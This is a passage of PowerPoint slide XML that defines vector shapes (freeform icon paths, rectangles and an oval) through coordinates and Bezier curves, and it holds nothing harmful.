                    <a:pt x="0" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="53"/>
                    <a:pt x="3" y="55"/>
                    <a:pt x="5"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86" name="Freeform 149">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A48D1CDF-6AA8-124A-B9B9-0AEFF5452A33}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3609975" y="2832100"/>
              <a:ext cx="95250" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 16 w 55"/>
                <a:gd name="T1" fmla="*/ 36 h 50"/>
                <a:gd name="T2" fmla="*/ 7 w 55"/>
                <a:gd name="T3" fmla="*/ 25 h 50"/>
                <a:gd name="T4" fmla="*/ 0 w 55"/>
                <a:gd name="T5" fmla="*/ 32 h 50"/>
                <a:gd name="T6" fmla="*/ 13 w 55"/>
                <a:gd name="T7" fmla="*/ 47 h 50"/>
                <a:gd name="T8" fmla="*/ 16 w 55"/>
                <a:gd name="T9" fmla="*/ 50 h 50"/>
                <a:gd name="T10" fmla="*/ 16 w 55"/>
                <a:gd name="T11" fmla="*/ 50 h 50"/>
                <a:gd name="T12" fmla="*/ 20 w 55"/>
                <a:gd name="T13" fmla="*/ 47 h 50"/>
                <a:gd name="T14" fmla="*/ 55 w 55"/>
                <a:gd name="T15" fmla="*/ 7 h 50"/>
                <a:gd name="T16" fmla="*/ 48 w 55"/>
                <a:gd name="T17" fmla="*/ 0 h 50"/>
                <a:gd name="T18" fmla="*/ 16 w 55"/>
                <a:gd name="T19"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0">
                  <a:moveTo>
                    <a:pt x="16" y="36"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="25"/>
                    <a:pt x="7" y="25"/>
                    <a:pt x="7" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="32"/>
                    <a:pt x="0" y="32"/>
                    <a:pt x="0" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="47"/>
                    <a:pt x="13" y="47"/>
                    <a:pt x="13" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="48"/>
                    <a:pt x="15" y="50"/>
                    <a:pt x="16" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="50"/>
                    <a:pt x="16" y="50"/>
                    <a:pt x="16" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="50"/>
                    <a:pt x="19" y="48"/>
                    <a:pt x="20" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="7"/>
                    <a:pt x="55" y="7"/>
                    <a:pt x="55" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="0"/>
                    <a:pt x="48" y="0"/>
                    <a:pt x="48" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="16" y="3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87" name="Freeform 150">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D307A4D0-E2F8-B246-8BE8-CBD7CC809905}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3584575" y="2974975"/>
              <a:ext cx="93663" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 5 w 55"/>
                <a:gd name="T1" fmla="*/ 56 h 56"/>
                <a:gd name="T2" fmla="*/ 50 w 55"/>
                <a:gd name="T3" fmla="*/ 56 h 56"/>
                <a:gd name="T4" fmla="*/ 55 w 55"/>
                <a:gd name="T5" fmla="*/ 52 h 56"/>
                <a:gd name="T6" fmla="*/ 55 w 55"/>
                <a:gd name="T7" fmla="*/ 26 h 56"/>
                <a:gd name="T8" fmla="*/ 46 w 55"/>
                <a:gd name="T9" fmla="*/ 37 h 56"/>
                <a:gd name="T10" fmla="*/ 46 w 55"/>
                <a:gd name="T11" fmla="*/ 47 h 56"/>
                <a:gd name="T12" fmla="*/ 36 w 55"/>
                <a:gd name="T13" fmla="*/ 47 h 56"/>
                <a:gd name="T14" fmla="*/ 31 w 55"/>
                <a:gd name="T15" fmla="*/ 47 h 56"/>
                <a:gd name="T16" fmla="*/ 31 w 55"/>
                <a:gd name="T17" fmla="*/ 47 h 56"/>
                <a:gd name="T18" fmla="*/ 27 w 55"/>
                <a:gd name="T19" fmla="*/ 47 h 56"/>
                <a:gd name="T20" fmla="*/ 12 w 55"/>
                <a:gd name="T21" fmla="*/ 47 h 56"/>
                <a:gd name="T22" fmla="*/ 12 w 55"/>
                <a:gd name="T23" fmla="*/ 28 h 56"/>
                <a:gd name="T24" fmla="*/ 11 w 55"/>
                <a:gd name="T25" fmla="*/ 27 h 56"/>
                <a:gd name="T26" fmla="*/ 12 w 55"/>
                <a:gd name="T27" fmla="*/ 26 h 56"/>
                <a:gd name="T28" fmla="*/ 12 w 55"/>
                <a:gd name="T29" fmla="*/ 12 h 56"/>
                <a:gd name="T30" fmla="*/ 43 w 55"/>
                <a:gd name="T31" fmla="*/ 12 h 56"/>
                <a:gd name="T32" fmla="*/ 52 w 55"/>
                <a:gd name="T33" fmla="*/ 2 h 56"/>
                <a:gd name="T34" fmla="*/ 50 w 55"/>
                <a:gd name="T35" fmla="*/ 0 h 56"/>
                <a:gd name="T36" fmla="*/ 5 w 55"/>
                <a:gd name="T37" fmla="*/ 0 h 56"/>
                <a:gd name="T38" fmla="*/ 0 w 55"/>
                <a:gd name="T39" fmla="*/ 7 h 56"/>
                <a:gd name="T40" fmla="*/ 0 w 55"/>
                <a:gd name="T41" fmla="*/ 52 h 56"/>
                <a:gd name="T42" fmla="*/ 5 w 55"/>
                <a:gd name="T43"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56">
                  <a:moveTo>
                    <a:pt x="5" y="56"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="56"/>
                    <a:pt x="50" y="56"/>
                    <a:pt x="50" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="56"/>
                    <a:pt x="55" y="55"/>
                    <a:pt x="55" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="26"/>
                    <a:pt x="55" y="26"/>
                    <a:pt x="55" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="37"/>
                    <a:pt x="46" y="37"/>
                    <a:pt x="46" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="47"/>
                    <a:pt x="46" y="47"/>
                    <a:pt x="46" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="47"/>
                    <a:pt x="36" y="47"/>
                    <a:pt x="36" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="47"/>
                    <a:pt x="33" y="47"/>
                    <a:pt x="31" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="47"/>
                    <a:pt x="31" y="47"/>
                    <a:pt x="31" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="47"/>
                    <a:pt x="28" y="47"/>
                    <a:pt x="27" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="47"/>
                    <a:pt x="12" y="47"/>
                    <a:pt x="12" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="28"/>
                    <a:pt x="12" y="28"/>
                    <a:pt x="12" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="27"/>
                    <a:pt x="11" y="27"/>
                    <a:pt x="11" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="26"/>
                    <a:pt x="12" y="26"/>
                    <a:pt x="12" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="12"/>
                    <a:pt x="12" y="12"/>
                    <a:pt x="12" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="12"/>
                    <a:pt x="43" y="12"/>
                    <a:pt x="43" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="2"/>
                    <a:pt x="52" y="2"/>
                    <a:pt x="52" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="2"/>
                    <a:pt x="51" y="0"/>
                    <a:pt x="50" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="0"/>
                    <a:pt x="5" y="0"/>
                    <a:pt x="5" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="0"/>
                    <a:pt x="0" y="4"/>
                    <a:pt x="0" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="52"/>
                    <a:pt x="0" y="52"/>
                    <a:pt x="0" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="55"/>
                    <a:pt x="3" y="56"/>
                    <a:pt x="5" y="5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88" name="Freeform 151">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F159B54-64C2-494F-94D6-DE5BB0F29EFA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3609975" y="2968625"/>
              <a:ext cx="95250" cy="82550"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 16 w 55"/>
                <a:gd name="T1" fmla="*/ 35 h 48"/>
                <a:gd name="T2" fmla="*/ 7 w 55"/>
                <a:gd name="T3" fmla="*/ 25 h 48"/>
                <a:gd name="T4" fmla="*/ 0 w 55"/>
                <a:gd name="T5" fmla="*/ 31 h 48"/>
                <a:gd name="T6" fmla="*/ 13 w 55"/>
                <a:gd name="T7" fmla="*/ 46 h 48"/>
                <a:gd name="T8" fmla="*/ 16 w 55"/>
                <a:gd name="T9" fmla="*/ 48 h 48"/>
                <a:gd name="T10" fmla="*/ 16 w 55"/>
                <a:gd name="T11" fmla="*/ 48 h 48"/>
                <a:gd name="T12" fmla="*/ 20 w 55"/>
                <a:gd name="T13" fmla="*/ 46 h 48"/>
                <a:gd name="T14" fmla="*/ 55 w 55"/>
                <a:gd name="T15" fmla="*/ 6 h 48"/>
                <a:gd name="T16" fmla="*/ 48 w 55"/>
                <a:gd name="T17" fmla="*/ 0 h 48"/>
                <a:gd name="T18" fmla="*/ 16 w 55"/>
                <a:gd name="T19" fmla="*/ 3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48">
                  <a:moveTo>
                    <a:pt x="16" y="35"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="25"/>
                    <a:pt x="7" y="25"/>
                    <a:pt x="7" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="31"/>
                    <a:pt x="0" y="31"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="46"/>
                    <a:pt x="13" y="46"/>
                    <a:pt x="13" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="47"/>
                    <a:pt x="15" y="48"/>
                    <a:pt x="16" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="48"/>
                    <a:pt x="16" y="48"/>
                    <a:pt x="16" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="48"/>
                    <a:pt x="19" y="47"/>
                    <a:pt x="20" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="6"/>
                    <a:pt x="55" y="6"/>
                    <a:pt x="55" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="0"/>
                    <a:pt x="48" y="0"/>
                    <a:pt x="48" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="16" y="3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89" name="Freeform 152">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11B2C968-4009-6C4E-9ABF-26D4D87079C6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3584575" y="3111500"/>
              <a:ext cx="93663" cy="93663"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 46 w 55"/>
                <a:gd name="T1" fmla="*/ 43 h 55"/>
                <a:gd name="T2" fmla="*/ 36 w 55"/>
                <a:gd name="T3" fmla="*/ 43 h 55"/>
                <a:gd name="T4" fmla="*/ 31 w 55"/>
                <a:gd name="T5" fmla="*/ 46 h 55"/>
                <a:gd name="T6" fmla="*/ 31 w 55"/>
                <a:gd name="T7" fmla="*/ 46 h 55"/>
                <a:gd name="T8" fmla="*/ 27 w 55"/>
                <a:gd name="T9" fmla="*/ 43 h 55"/>
                <a:gd name="T10" fmla="*/ 12 w 55"/>
                <a:gd name="T11" fmla="*/ 43 h 55"/>
                <a:gd name="T12" fmla="*/ 12 w 55"/>
                <a:gd name="T13" fmla="*/ 26 h 55"/>
                <a:gd name="T14" fmla="*/ 11 w 55"/>
                <a:gd name="T15" fmla="*/ 26 h 55"/>
                <a:gd name="T16" fmla="*/ 12 w 55"/>
                <a:gd name="T17" fmla="*/ 25 h 55"/>
                <a:gd name="T18" fmla="*/ 12 w 55"/>
                <a:gd name="T19" fmla="*/ 11 h 55"/>
                <a:gd name="T20" fmla="*/ 43 w 55"/>
                <a:gd name="T21" fmla="*/ 11 h 55"/>
                <a:gd name="T22" fmla="*/ 52 w 55"/>
                <a:gd name="T23" fmla="*/ 1 h 55"/>
                <a:gd name="T24" fmla="*/ 50 w 55"/>
                <a:gd name="T25" fmla="*/ 0 h 55"/>
                <a:gd name="T26" fmla="*/ 5 w 55"/>
                <a:gd name="T27" fmla="*/ 0 h 55"/>
                <a:gd name="T28" fmla="*/ 0 w 55"/>
                <a:gd name="T29" fmla="*/ 6 h 55"/>
                <a:gd name="T30" fmla="*/ 0 w 55"/>
                <a:gd name="T31" fmla="*/ 51 h 55"/>
                <a:gd name="T32" fmla="*/ 5 w 55"/>
                <a:gd name="T33" fmla="*/ 55 h 55"/>
                <a:gd name="T34" fmla="*/ 50 w 55"/>
                <a:gd name="T35" fmla="*/ 55 h 55"/>
                <a:gd name="T36" fmla="*/ 55 w 55"/>
                <a:gd name="T37" fmla="*/ 51 h 55"/>
                <a:gd name="T38" fmla="*/ 55 w 55"/>
                <a:gd name="T39" fmla="*/ 24 h 55"/>
                <a:gd name="T40" fmla="*/ 46 w 55"/>
                <a:gd name="T41" fmla="*/ 35 h 55"/>
                <a:gd name="T42" fmla="*/ 46 w 55"/>
                <a:gd name="T43" fmla="*/ 4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55">
                  <a:moveTo>
                    <a:pt x="46" y="43"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="43"/>
                    <a:pt x="36" y="43"/>
                    <a:pt x="36" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="46"/>
                    <a:pt x="33" y="46"/>
                    <a:pt x="31" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="46"/>
                    <a:pt x="31" y="46"/>
                    <a:pt x="31" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="46"/>
                    <a:pt x="28" y="46"/>
                    <a:pt x="27" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="43"/>
                    <a:pt x="12" y="43"/>
                    <a:pt x="12" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="26"/>
                    <a:pt x="12" y="26"/>
                    <a:pt x="12" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="26"/>
                    <a:pt x="11" y="26"/>
                    <a:pt x="11" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="25"/>
                    <a:pt x="12" y="25"/>
                    <a:pt x="12" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="11"/>
                    <a:pt x="12" y="11"/>
                    <a:pt x="12" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="11"/>
                    <a:pt x="43" y="11"/>
                    <a:pt x="43" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="1"/>
                    <a:pt x="52" y="1"/>
                    <a:pt x="52" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="1"/>
                    <a:pt x="51" y="0"/>
                    <a:pt x="50" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="0"/>
                    <a:pt x="5" y="0"/>
                    <a:pt x="5" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="0"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="51"/>
                    <a:pt x="0" y="51"/>
                    <a:pt x="0" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="53"/>
                    <a:pt x="3" y="55"/>
                    <a:pt x="5" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="55"/>
                    <a:pt x="50" y="55"/>
                    <a:pt x="50" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="55"/>
                    <a:pt x="55" y="53"/>
                    <a:pt x="55" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="24"/>
                    <a:pt x="55" y="24"/>
                    <a:pt x="55" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="35"/>
                    <a:pt x="46" y="35"/>
                    <a:pt x="46" y="35"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="46" y="4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90" name="Freeform 153">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BA2BFDA-D63B-5943-887D-65878F801707}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3609975" y="3100388"/>
              <a:ext cx="95250" cy="84138"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 16 w 55"/>
                <a:gd name="T1" fmla="*/ 36 h 49"/>
                <a:gd name="T2" fmla="*/ 7 w 55"/>
                <a:gd name="T3" fmla="*/ 26 h 49"/>
                <a:gd name="T4" fmla="*/ 0 w 55"/>
                <a:gd name="T5" fmla="*/ 32 h 49"/>
                <a:gd name="T6" fmla="*/ 13 w 55"/>
                <a:gd name="T7" fmla="*/ 47 h 49"/>
                <a:gd name="T8" fmla="*/ 16 w 55"/>
                <a:gd name="T9" fmla="*/ 49 h 49"/>
                <a:gd name="T10" fmla="*/ 16 w 55"/>
                <a:gd name="T11" fmla="*/ 49 h 49"/>
                <a:gd name="T12" fmla="*/ 20 w 55"/>
                <a:gd name="T13" fmla="*/ 47 h 49"/>
                <a:gd name="T14" fmla="*/ 55 w 55"/>
                <a:gd name="T15" fmla="*/ 7 h 49"/>
                <a:gd name="T16" fmla="*/ 48 w 55"/>
                <a:gd name="T17" fmla="*/ 0 h 49"/>
                <a:gd name="T18" fmla="*/ 16 w 55"/>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49">
                  <a:moveTo>
                    <a:pt x="16" y="36"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="26"/>
                    <a:pt x="7" y="26"/>
                    <a:pt x="7" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="32"/>
                    <a:pt x="0" y="32"/>
                    <a:pt x="0" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="47"/>
                    <a:pt x="13" y="47"/>
                    <a:pt x="13" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="48"/>
                    <a:pt x="15" y="49"/>
                    <a:pt x="16" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="49"/>
                    <a:pt x="16" y="49"/>
                    <a:pt x="16" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="49"/>
                    <a:pt x="19" y="48"/>
                    <a:pt x="20" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="7"/>
                    <a:pt x="55" y="7"/>
                    <a:pt x="55" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="0"/>
                    <a:pt x="48" y="0"/>
                    <a:pt x="48" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="16" y="3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91" name="Rectangle 154">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2393FCB8-36DF-E44B-A3F5-8EADF26C28B6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3722688" y="2876550"/>
              <a:ext cx="160338" cy="30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92" name="Rectangle 155">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6367289-C9AA-6740-80CF-AAD756609990}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3722688" y="3006725"/>
              <a:ext cx="160338"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93" name="Rectangle 156">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FCF9545-B1E3-7345-A1B3-B052D885DD69}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3722688" y="3144838"/>
              <a:ext cx="160338" cy="349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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="94" name="组合 93">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D824EEE0-1676-C74C-8248-905377924459}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6308482" y="2519198"/>
            <a:ext cx="485253" cy="481012"/>
            <a:chOff x="4764088" y="3903663"/>
            <a:chExt cx="1084263" cy="1082675"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="95" name="Oval 185">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{922C65FC-5647-4C4E-8F5E-8C87917B4C6B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4764088" y="3903663"/>
              <a:ext cx="1084263" cy="1082675"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="965BA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96" name="Freeform 186">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F760604E-ABB3-BB45-937B-788E6A830C46}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5053013" y="4106863"/>
              <a:ext cx="704850" cy="879475"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 98 w 411"/>
                <a:gd name="T1" fmla="*/ 232 h 513"/>
                <a:gd name="T2" fmla="*/ 98 w 411"/>
                <a:gd name="T3" fmla="*/ 232 h 513"/>
                <a:gd name="T4" fmla="*/ 98 w 411"/>
                <a:gd name="T5" fmla="*/ 232 h 513"/>
                <a:gd name="T6" fmla="*/ 39 w 411"/>
                <a:gd name="T7" fmla="*/ 0 h 513"/>
                <a:gd name="T8" fmla="*/ 29 w 411"/>
                <a:gd name="T9" fmla="*/ 7 h 513"/>
                <a:gd name="T10" fmla="*/ 6 w 411"/>
                <a:gd name="T11" fmla="*/ 26 h 513"/>
                <a:gd name="T12" fmla="*/ 8 w 411"/>
                <a:gd name="T13" fmla="*/ 37 h 513"/>
                <a:gd name="T14" fmla="*/ 40 w 411"/>
                <a:gd name="T15" fmla="*/ 69 h 513"/>
                <a:gd name="T16" fmla="*/ 44 w 411"/>
                <a:gd name="T17" fmla="*/ 73 h 513"/>
                <a:gd name="T18" fmla="*/ 65 w 411"/>
                <a:gd name="T19" fmla="*/ 123 h 513"/>
                <a:gd name="T20" fmla="*/ 93 w 411"/>
                <a:gd name="T21" fmla="*/ 158 h 513"/>
                <a:gd name="T22" fmla="*/ 97 w 411"/>
                <a:gd name="T23" fmla="*/ 231 h 513"/>
                <a:gd name="T24" fmla="*/ 67 w 411"/>
                <a:gd name="T25" fmla="*/ 213 h 513"/>
                <a:gd name="T26" fmla="*/ 56 w 411"/>
                <a:gd name="T27" fmla="*/ 343 h 513"/>
                <a:gd name="T28" fmla="*/ 46 w 411"/>
                <a:gd name="T29" fmla="*/ 343 h 513"/>
                <a:gd name="T30" fmla="*/ 22 w 411"/>
                <a:gd name="T31" fmla="*/ 364 h 513"/>
                <a:gd name="T32" fmla="*/ 39 w 411"/>
                <a:gd name="T33" fmla="*/ 388 h 513"/>
                <a:gd name="T34" fmla="*/ 72 w 411"/>
                <a:gd name="T35" fmla="*/ 420 h 513"/>
                <a:gd name="T36" fmla="*/ 162 w 411"/>
                <a:gd name="T37" fmla="*/ 513 h 513"/>
                <a:gd name="T38" fmla="*/ 411 w 411"/>
                <a:gd name="T39" fmla="*/ 373 h 513"/>
                <a:gd name="T40" fmla="*/ 174 w 411"/>
                <a:gd name="T41" fmla="*/ 128 h 513"/>
                <a:gd name="T42" fmla="*/ 61 w 411"/>
                <a:gd name="T43" fmla="*/ 19 h 513"/>
                <a:gd name="T44" fmla="*/ 45 w 411"/>
                <a:gd name="T45" fmla="*/ 4 h 513"/>
                <a:gd name="T46" fmla="*/ 39 w 411"/>
                <a:gd name="T47"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1" h="513">
                  <a:moveTo>
                    <a:pt x="98" y="232"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="232"/>
                    <a:pt x="98" y="232"/>
                    <a:pt x="98" y="232"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="232"/>
                    <a:pt x="98" y="232"/>
                    <a:pt x="98" y="232"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="39" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="0"/>
